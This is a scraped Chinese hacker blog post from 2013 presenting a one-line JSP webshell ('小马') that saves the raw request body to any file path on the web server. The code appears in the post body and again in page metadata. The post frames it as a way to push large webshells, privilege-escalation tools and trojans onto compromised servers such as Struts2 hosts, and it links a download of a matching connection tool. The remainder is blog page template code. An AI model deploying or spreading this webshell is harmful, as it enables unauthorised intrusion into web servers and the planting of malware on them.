K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全网络安全 0day漏洞渗透测试黑客

日志

关于我

K8拉登哥哥

K8搞基大队队长专注于被妞泡

文章分类

LOFTER精选

八招诀窍，教你实力撩妹 >

网易考拉推荐

GACHA精选

[原创]新型JSP小马(支持上传任意格式文件) 附有连接工具

2013-11-26 21:11:50| 分类：原创工具 | 标签： |举报 |字号大中小订阅

下载LOFTER 我的照片书 |

工具: K8upload_1125[K8]
编译: K8小组专用 Delphi7破解版
组织: K8搞基大队[K8team]
作者: K8拉登哥哥
博客: http://qqhack8.blog.163.com
发布: 2013/11/26 21:02:52

K8新型JSP小马(支持上传任意格式文件) 附有连接工具以下代码自己保存为 upload.jsp
<%@page import="java.io.*"%><%if(request.getParameter("f")!=null){FileOutputStream os=new FileOutputStream(application.getRealPath("/")+request.getParameter("f"));InputStream is=request.getInputStream();byte[] b=new byte[512];int n;while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();}%>
灵感来自于前断时间写的HTTP协议的马,除了JSP其它脚本也会陆续公开给大家
其实就是文件流操作，WEB程序员们经常用到，上传图片各种文件啥的，
但没人想到过用在这方面，对于JAVA我也不怎么懂，这个一句话，我也是百度关键字 JSP 文件流后
从百度那些Web程序员几百行代码的文件流操作例子里浓缩出来的其实我不懂JAVA，看得头真大。

简介:

传统小马只支持上传大马等文本文件,我们一般都是先把大马传到服务器,
然后再上传cmd.exe或pr.exe等等其它相关提权工具,又或者直接上传木马.
但是有时候,我们根本就无法上传WebShell大马,或者说传过去功能爆废了.
特别是Struts2环境,大家应该深有感悟。碰到好多,只能传那个普通的一句话小马
但是要传个大马啥的,基本上全都废了。但是这样我们就没办法了吗?答案是NO.

图片:

[原创]K8新型JSP小马(支持上传任意格式文件) 附有连接工具 - K8拉登哥哥 - K8拉登哥哥s Blog

功能:

下载地址:
文件: K8upload_1125[K8].rar
MD5: D55CAFE4E1764825C0980C701A84EDC2
SHA1: 3BA9F7CBECB9C95B8272EEB280D2F323123D4AAE
平台: XP/Vista/Win7/Win8/2000/2003/2008/2012
猛击: http://pan.baidu.com/s/1gI3n

提示:
下载后一定要校验文件的SHA1值是否正确,如不符则可能文件损坏或被人捆木马.
不推荐校验MD5 (微软官方主页上的产品都不再提供文件的MD5),因为可以碰撞
校验MD5并不能保证你所使用的就真是原文件,一般的黑客搞不了,但XX黑客就...

注意:
在K8拉登哥哥BLOG里下载的,工具一但更新,旧版地址若是失效,将不再提供下载.

评论这张

转发至微博

阅读(11381)| 评论(1)

推荐转载

历史上的今天

在LOFTER的更多文章

this.p={  m:2,
              b:2,
              loftPermalink:'',
              id:'fks_087064083083085064085085087071072087080071085082081074092083',
              blogTitle:'[原创]新型JSP小马(支持上传任意格式文件) 附有连接工具',
              blogAbstract:'工具: K8upload_1125[K8]<br\>编译: K8小组专用 Delphi7破解版<br\>组织: K8搞基大队[K8team]<br\>作者: K8拉登哥哥<br\>博客: http://qqhack8.blog.163.com<br\>发布: 2013/11/26 21:02:52<br\><br\><br\>K8新型JSP小马(支持上传任意格式文件)  附有连接工具  以下代码自己保存为 upload.jsp<br\><%@page import=\"java.io.*\"%><%if(request.getParameter(\"f\")!=null){FileOutputStream os=new FileOutputStream(application.getRealPath(\"/\")+request.getParameter(\"f\"));InputStream',
              blogTag:'',
              blogUrl:'blog/static/114147985201310269955401',
              isPublished:1,
              istop:false,
              type:0,
              modifyTime:1385473614342,
              publishTime:1385471510394,
              permalink:'blog/static/114147985201310269955401',
              commentCount:1,
              mainCommentCount:1,
              recommendCount:0,
              bsrk:-100,
              publisherId:0,
              recomBlogHome:false,
              currentRecomBlog:false,
              attachmentsFileIds:[],
              vote:{},
              groupInfo:{},
              friendstatus:'none',
              followstatus:'unFollow',
              pubSucc:'',
              visitorProvince:'',
              visitorCity:'',
              visitorNewUser:false,
              postAddInfo:{},
              mset:'000',
              mcon:'',
              srk:-100,
              remindgoodnightblog:false,
              isBlackVisitor:false,
              isShowYodaoAd:false,
              hostIntro:'K8搞基大队队长 专注于被妞泡',
              hmcon:'1',
              selfRecomBlogCount:'0',
              lofter_single:'<iframe width="140" height="560" style="overflow:hidden;" src="http://www.lofter.com/mailEntry.do?blogad=1&blog" frameBorder="0"></iframe>'
            }

{list a as x}
    {if !!x}
    <div class="iblock nbw-fce nbw-f40">
      <a class="fc03 noul" target="_blank" hidefocus="true" href="http://blog.163.com/${x.visitorName}/">
      {if x.visitorName==visitor.userName}
      <img alt="${x.visitorNickname|escape}" onerror="this.src=location.f40" class="cwd bdwa bdc0" src="${fn1(x.visitorName)}&r=${visitor.imageUpdateTime}"/>
      {else}
      <img alt="${x.visitorNickname|escape}" onerror="this.src=location.f40" class="cwd bdwa bdc0" src="${fn1(x.visitorName)}"/>
      {/if}
      </a>
      <div class="cwd vname thide">
        {if x.moveFrom=='wap'}
          <a class="noul pnt" target="_blank" href="http://blog.163.com/services/wapblog.html?frompersonalbloghome"><span title="来自网易手机博客" class="iblock wapIcon"> </span></a>
        {elseif x.moveFrom=='iphone'}
          <a class="noul pnt" target="_blank"><span title="来自iPhone客户端" class="iblock iphoneIcon"> </span></a>
        {elseif x.moveFrom=='android'}
          <a class="noul pnt" target="_blank"><span title="来自Android客户端" class="iblock androidIcon"> </span></a>
        {elseif x.moveFrom=='mobile'}
          <a class="noul pnt" target="_blank" href="http://blog.163.com/services/emsblog.html?frompersonalbloghome"><span title="来自网易短信写博" class="iblock wapIcon"> </span></a>
        {/if}
        <a class="fc03 m2a"  target="_blank" hidefocus="true" href="http://blog.163.com/${x.visitorName}/">
          ${fn(x.visitorNickname,8)|escape}
        </a>
      </div>
    </div>
    {/if}
    {/list}

<#--最新日志，群博日志--> <#--推荐日志-->

<p class="fc06">推荐过这篇日志的人：</p>
    <div>
      {list a as x}
      {if !!x}
      <div class="iblock nbw-fce nbw-f40">
        <a class="fc03 noul" target="_blank" hidefocus="true" href="http://blog.163.com/${x.recommenderName}/">
        <img alt="${x.recommenderNickname|escape}" onerror="this.src=location.f40" class="cwd bdwa bdc0" src="${fn1(x.recommenderName)}"/>
        </a>
        <div class="cwd thide">
          <a class="fc03 m2a" target="_blank" hidefocus="true" href="http://blog.163.com/${x.recommenderName}/">
            ${fn(x.recommenderNickname,6)|escape}
          </a>
        </div>
      </div>
      {/if}
      {/list}
    </div>
    {if !!b&&b.length>0}
    <p  class="fc06">他们还推荐了：</p>
    <ul>
    {list b as y}
      {if !!y}
        <li class="rrb"><span class="iblock">·</span><a class="fc03 m2a" target="_blank" href="http://blog.163.com/${y.recommendBlogPermalink}/?from=blog/static/114147985201310269955401">${y.recommendBlogTitle|escape}</a></li>
      {/if}
    {/list}
    </ul>
    {/if}

<#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇，下一篇--> <#-- 热度 -->

{list a as x}
    {if !!x}
    <div class="hotItem iblock nbw-fce nbw-f40">
      <a class="fc03 noul" target="_blank" hidefocus="true" href="http://blog.163.com/${x.publisherUsername}/">
      {if x.publisherUsername==visitor.userName}
      <img alt="${x.publisherNickname|escape}" onerror="this.src=location.f40" class="cwd bdwa bdc0" src="${fn1(x.publisherUsername)}&r=${visitor.imageUpdateTime}"/>
      {else}
      <img alt="${x.publisherNickname|escape}" onerror="this.src=location.f40" class="cwd bdwa bdc0" src="${fn1(x.publisherUsername)}"/>
      {/if}
      </a>
      <div class="cwd vname thide">
        <a class="fc03 m2a"  target="_blank" hidefocus="true" href="http://blog.163.com/${x.publisherUsername}/">
          ${fn(x.publisherNickname,8)|escape}
        </a>
      </div>
      <a class="f-myLikeIcons hottype {if x.type==1} js-liketype{elseif x.type==2} js-reblogtype{elseif x.type==3} js-sharetype{else}{/if}" target="_blank" hidefocus="true" href="http://blog.163.com/${x.publisherUsername}/"> </a>
    </div>
    {/if}
    {/list}

<#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->

页脚

我的照片书 - 博客风格 - 手机博客 - 下载LOFTER APP - 订阅此博客

K8拉登哥哥's Blog

导航

日志

[原创]新型JSP小马(支持上传任意格式文件) 附有连接工具

历史上的今天

最近读者

热度

在LOFTER的更多文章

评论

页脚